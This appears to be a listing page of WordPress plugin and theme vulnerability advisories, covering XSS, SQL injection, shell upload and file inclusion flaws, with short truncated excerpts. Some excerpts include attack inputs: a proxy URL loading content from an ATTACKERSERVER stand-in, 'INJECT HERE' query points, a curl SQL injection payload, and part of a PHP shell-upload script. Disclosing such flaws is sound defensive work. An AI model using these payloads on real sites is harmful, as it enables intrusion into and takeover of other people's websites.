Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Barclaycart - Unauthenticated Shell Upload
The Barclaycart WordPress plugin was found to be vulnerable to an Unauthenticated Shell Upload security vulnerability, due to using a vulnerable version of the third-party uploadify dependency. This issue has been seen exploited in the wild. "@$uploadfile",...
OptimizePress Theme < 1.6 - Unauthenticated Arbitrary File Upload
The OptimizePress premium WordPress theme was vulnerable to Unauthenticated Arbitrary File Upload, which could allow unauthenticated attackers to compromise a WordPress site. This vulnerability has been seen exploited in the wild. The affected file was:...
Plugin HD Webplayer <= 1.1 - SQL Injections
The last time it was checked the plugin was still affected and had been closed. http://example.com/wp-content/plugins/hd-webplayer/config.php?id=INJECT HERE http://example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=INJECT HERE...
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
Attackers have been seen probing for the "/wp-content/plugins/mm-forms/includes/doajaxfileupload.php" file. PostShell.php "@$uploadfile"; curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access :...
Omni Secure Files 0.1.13 - Unauthenticated Arbitrary File Upload
This plugin came with the vulnerable plupload library and has been seen exploited in the wild. The vulnerable file is: http://www.example.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php...
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...
Community Events <= 1.2.1 - SQL Injection
The Community Events WordPress plugin was affected by a SQL Injection security vulnerability. curl --data "id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- " http://www.site.com/wp-content/plugins/community-events/tracker.php...
myGallery <= 1.4b4 - Unauthenticated File Inclusion
The MySliderGallery WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. This vulnerability has been seen exploited in the wild with the following payload:...